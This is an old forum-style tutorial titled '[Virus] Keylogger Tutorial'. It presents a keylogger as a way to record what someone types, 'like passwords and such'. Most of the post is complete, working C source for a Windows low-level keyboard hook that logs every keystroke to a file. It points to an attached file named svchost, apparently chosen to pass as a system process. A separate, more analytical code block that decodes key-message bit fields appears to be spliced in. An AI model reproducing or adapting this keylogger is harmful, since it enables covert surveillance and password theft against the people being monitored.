
http://www.buidao.com

4/15/10

[Virus] Keylogger Tutorial

what is a keylogger?

it's a program that logs everything that you type on the keyboard.

what are its uses to me?

well, if you want to record everything someone types, then you can see anything you want, like passwords and such.

how do i get one?

you can buy some corporate or home-usage ones that are made for recording what employees are doing or what your kids are doing. that is a bad method though, since they are bloated, cost money (since most people don't know how to find warez), and it's better to make your own since you can make it do what you want it to do.

ok, how do i do this?

you program one. if you're new to programming then learn how to program in c, then come back here. if you know how to program in c then read on.

there are two ways of making a keylogger:

1. using the GetAsyncKeyState API. look at svchost.c.

2. Using the SetWindowsHookEx API. This is the preferred method but only works on NT-based systems. The reason this way is preferred is that it is much more efficient than GetAsyncKeyState. See for yourself. No need to check which character is being pressed, and no need to check other stuff like whether the value -32767 is being returned. Look here about this. When you use the SetWindowsHookEx API you "hook" the keyboard so that you can send all of the keys pressed somewhere. When making a keylogger you usually send it to a file so that all of the keys will be logged there. The only disadvantage of using this API, if you could even call it a disadvantage, is that you have to have a DLL as well as your .exe file. I found a piece of code that doesn't need a DLL. Here it is with a slight modification from me so that you don't have to have the keylogger close before you can view the file with the logged keys in it:

CODE C Language

// This code will only work if you have Windows NT or
// any later version installed; 2k and XP will work.

#define _WIN32_WINNT 0x0400

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

// Global hook handle
HHOOK hKeyHook;

// This is the function that is "exported" from the
// executable like any function is exported from a
// DLL. It is the hook handler routine for low level
// keyboard events.

__declspec(dllexport) LRESULT CALLBACK KeyEvent (
    int nCode,      // The hook code
    WPARAM wParam,  // The window message (WM_KEYUP, WM_KEYDOWN, etc.)
    LPARAM lParam   // A pointer to a struct with information about the pressed key
) {
    if ((nCode == HC_ACTION) &&            // HC_ACTION means we may process this event
        ((wParam == WM_SYSKEYDOWN) ||      // Only react if either a system key ...
         (wParam == WM_KEYDOWN)))          // ... or a normal key has been pressed.
    {
        // This struct contains various information about
        // the pressed key such as hardware scan code, virtual
        // key code and further flags.

        KBDLLHOOKSTRUCT hooked =
            *((KBDLLHOOKSTRUCT*)lParam);

        // dwMsg shall contain the information that would be stored
        // in the usual lParam argument of a WM_KEYDOWN message.
        // All information like hardware scan code and other flags
        // are stored within one double word at different bit offsets.
        // Refer to MSDN for further information:
        //
        // windowsuserinterface/userinput/keyboardinput/aboutkeyboardinput.asp
        //
        // (Keystroke Messages)

        DWORD dwMsg = 1;                   // repeat count of 1 in bits 0-15
        dwMsg += hooked.scanCode << 16;    // hardware scan code in bits 16-23
        dwMsg += hooked.flags << 24;       // extended-key flag (and the other flags) from bit 24 up

        // Call the GetKeyNameText() function to get the language-dependent
        // name of the pressed key. This function should return the name
        // of the pressed key in your language, aka the language used on
        // the system.

        char lpszName[0x100] = {0};
        lpszName[0] = '[';

        int i = GetKeyNameText(dwMsg,
                               (lpszName+1),0xFF) + 1;

        lpszName[i] = ']';

        // Append this name to the log file. The file is opened and
        // closed again for every key, so the log can be read while
        // the program is still running and no FILE handles are leaked.

        FILE *file;
        file=fopen("keys.log","a+");
        if (file) {
            fputs(lpszName,file);
            fclose(file);
        }
    }

    // the return value of the CallNextHookEx routine is always
    // returned by your HookProc routine. This allows other
    // applications to install and handle the same hook as well.

    return CallNextHookEx(hKeyHook,
                          nCode,wParam,lParam);
}

// This is a simple message loop that will be used
// to block while we are logging keys. It does not
// perform any real task ...

void MsgLoop()
{
    MSG message;
    while (GetMessage(&message,NULL,0,0)) {
        TranslateMessage( &message );
        DispatchMessage( &message );
    }
}

// This thread is started by the main routine to install
// the low level keyboard hook and start the message loop
// to loop forever while waiting for keyboard events.

DWORD WINAPI KeyLogger(LPVOID lpParameter)
{
    // Get a module handle to our own executable. Usually,
    // the return value of GetModuleHandle(NULL) should be
    // a valid handle to the current application instance,
    // but if it fails we will also try to actually load
    // ourself as a library. The thread's parameter is the
    // first command line argument which is the path to our
    // executable.

    HINSTANCE hExe = GetModuleHandle(NULL);
    if (!hExe) hExe = LoadLibrary((LPCSTR) lpParameter);

    // Everything failed, we can't install the hook ... this
    // never happened, but error handling is important.

    if (!hExe) return 1;

    hKeyHook = SetWindowsHookEx ( // install the hook:
        WH_KEYBOARD_LL,           // as a low level keyboard hook
        (HOOKPROC) KeyEvent,      // with the KeyEvent function from this executable
        hExe,                     // and the module handle to our own executable
        0                         // and finally, the hook should monitor all threads.
    );

    // Loop forever in a message loop and if the loop
    // stops some time, unhook the hook. I could have
    // added a signal handler for ctrl-c that unhooks
    // the hook once the application is terminated by
    // the user, but I was too lazy.

    MsgLoop();
    UnhookWindowsHookEx(hKeyHook);
    return 0;
}

// The main function just starts the thread that
// installs the keyboard hook and waits until it
// terminates.

int main(int argc, char** argv)
{
    HANDLE hThread;
    DWORD dwThread;

    hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)
                           KeyLogger, (LPVOID) argv[0], 0, &dwThread);

    if (hThread) {
        return WaitForSingleObject(hThread,INFINITE);
    } else {
        return 1;
    }
}
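The dwMsg value in the hook handler above rebuilds the lParam of a WM_KEYDOWN message out of a KBDLLHOOKSTRUCT, and the comment only says that the fields live "at different bit offsets". The following is an added example (written for this page, not code from the original post or from the attached file) that makes that layout explicit: it packs a scan code and the hook's flags byte into the lParam form exactly as the handler does, and decodes such a value back into its fields, so an analyst reading hook code or a log of key messages can see which bit means what. The LLKHF_* values are the ones defined in WinUser.h; the struct and function names are my own, and the inputs are constructed, so it runs on any platform and installs no hook.

```c
#include <stdint.h>
#include <stdio.h>

/* Layout of the WM_KEYDOWN / WM_KEYUP lParam (32 bits), per the
 * "Keystroke Messages" section the hook code refers to:
 *   bits 0-15  repeat count
 *   bits 16-23 hardware scan code
 *   bit  24    extended-key flag
 *   bits 25-28 reserved
 *   bit  29    context code (ALT held)
 *   bit  30    previous key state
 *   bit  31    transition state (0 = pressed, 1 = released) */

/* KBDLLHOOKSTRUCT.flags bits, values as defined in WinUser.h */
#define LLKHF_EXTENDED_BIT 0x01u   /* bit 0: extended key (e.g. right CTRL, arrow keys) */
#define LLKHF_INJECTED_BIT 0x10u   /* bit 4: event was synthesised with SendInput etc. */
#define LLKHF_ALTDOWN_BIT  0x20u   /* bit 5: ALT held */
#define LLKHF_UP_BIT       0x80u   /* bit 7: key being released */

typedef struct {
    unsigned repeat;     /* repeat count                          */
    unsigned scan_code;  /* hardware scan code                    */
    int extended;        /* extended-key flag                     */
    int alt_down;        /* context code: ALT held                */
    int key_up;          /* transition state: 1 = key released    */
} key_fields;

/* Build the lParam the same way the hook's dwMsg is built: repeat count 1,
 * scan code shifted to bit 16 and the whole flags byte shifted to bit 24.
 * Shifting the flags byte by 24 lands LLKHF_EXTENDED (bit 0) on bit 24,
 * LLKHF_ALTDOWN (bit 5) on bit 29 and LLKHF_UP (bit 7) on bit 31, which
 * is exactly where the lParam layout above expects them. */
uint32_t pack_lparam(unsigned scan_code, unsigned flags)
{
    uint32_t lparam = 1u;                    /* repeat count */
    lparam += (scan_code & 0xFFu) << 16;     /* scan code    */
    lparam += (flags & 0xFFu) << 24;         /* flags byte   */
    return lparam;
}

/* Decode an lParam back into its named fields. */
key_fields unpack_lparam(uint32_t lparam)
{
    key_fields f;
    f.repeat    = lparam & 0xFFFFu;
    f.scan_code = (lparam >> 16) & 0xFFu;
    f.extended  = (int)((lparam >> 24) & 1u);
    f.alt_down  = (int)((lparam >> 29) & 1u);
    f.key_up    = (int)((lparam >> 31) & 1u);
    return f;
}

int main(void)
{
    /* Constructed sample: scan code 0x48 (the keypad "8" / up-arrow
     * position) with the extended and ALT flags set, as the hook would
     * see it for ALT + up-arrow. */
    uint32_t lp = pack_lparam(0x48, LLKHF_EXTENDED_BIT | LLKHF_ALTDOWN_BIT);
    key_fields f = unpack_lparam(lp);
    printf("lParam 0x%08X: repeat=%u scan=0x%02X extended=%d alt=%d up=%d\n",
           lp, f.repeat, f.scan_code, f.extended, f.alt_down, f.key_up);
    return 0;
}
```

Note that the hook above only reacts to WM_KEYDOWN and WM_SYSKEYDOWN, so the LLKHF_UP bit is never set in the value it passes to GetKeyNameText; the decoder still handles it so the same routine can be used on values taken from WM_KEYUP messages.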


if anyone has any questions on this feel free to post them here.

enjoy.

Attached File svchost.txt (11.8K)

reflink: http://www.rohitab.com/discuss/index.php?showtopic=19360&st=20